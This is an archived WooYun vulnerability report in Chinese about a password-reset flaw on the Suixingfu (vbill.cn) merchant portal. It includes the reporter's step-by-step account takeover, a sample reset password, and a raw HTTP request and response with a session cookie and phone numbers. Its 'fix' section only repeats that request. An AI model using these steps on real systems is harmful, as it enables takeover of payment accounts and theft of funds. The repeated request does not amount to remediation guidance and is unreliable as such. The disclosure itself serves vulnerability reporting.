随行付任意密码重涉及大量资金可刷POS机提现

编号125569
Urlhttp://www.wooyun.org/bug.php?action=view&id=125569
漏洞状态未联系到厂商或者厂商积极忽略
漏洞标题随行付任意密码重涉及大量资金可刷POS机提现
漏洞类型设计缺陷/逻辑错误
厂商北京随行付信息技术有限公司
白帽子奥特曼
提交日期2015-08-07 13:02:00
公开日期2015-09-21 13:04:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank15
漏洞简介
None
漏洞细节

忘记密码处进行重设可以抓捕拦截手机验证进行重设密码
http://www.vbill.cn/mss/SafePwd/safe_rese_pwd.htm 进行密码找回。
账号有 admin1 admin2 admin3 admin4 等等
使用绑定手机找回,本地代理抓包得到手机验证码,即可重设密码。
http://www.vbill.cn/mss/login/loginOut.htm?lgUrl= 重设好密码在此处进行登录
帐号admin1 密码qq123456 2.帐号admin2 密码qq123456
以此类推,帐号对上,密码就可以重设。

POST /mss/SafePwd/sendPhoneMsg.htm HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.vbill.cn/mss/SafePwd/safe_rese_pwd3.htm?type=pwdMsg&uuid=aec1c557e4f445d59a3c91fbac8aecfe
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.vbill.cn
Content-Length: 19
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=5E527A30530992B3F52B89DEE575E60D; _5t_trace_sid=87b524b3ba0afe81013dd448188d103e; _5t_trace_tms=1
bindTel=13626131230
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: zh-CN
Date: Thu, 09 Jul 2015 11:01:11 GMT
Content-Length: 247
{"retInf":"6396","safeBean":{"uuid":null,"inMno":null,"safeLevel":null,"bindTel":"18860900198","payPwd":null,"question":null,"question2":null,"answer":null,"answer2":null,"legPerCrdNo":null,"user":null,"retMsg":null,"usaPwd":null,"password":null}}

POC

132.png

131.png

1.jpg


2.png


修复方案

POST /mss/SafePwd/sendPhoneMsg.htm HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.vbill.cn/mss/SafePwd/safe_rese_pwd3.htm?type=pwdMsg&uuid=aec1c557e4f445d59a3c91fbac8aecfe
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.vbill.cn
Content-Length: 19
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=5E527A30530992B3F52B89DEE575E60D; _5t_trace_sid=87b524b3ba0afe81013dd448188d103e; _5t_trace_tms=1
bindTel=13626131230
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: zh-CN
Date: Thu, 09 Jul 2015 11:01:11 GMT
Content-Length: 247
{"retInf":"6396","safeBean":{"uuid":null,"inMno":null,"safeLevel":null,"bindTel":"18860900198","payPwd":null,"question":null,"question2":null,"answer":null,"answer2":null,"legPerCrdNo":null,"user":null,"retMsg":null,"usaPwd":null,"password":null}}</code>
设计不当 ,修复

状态信息 2015-08-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复(not set)
回应信息未能联系到厂商或者厂商积极拒绝漏洞Rank:15 (WooYun评价)
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

楼主走路小心被跟踪。。。。

这只猪02015-09-21 15:46:00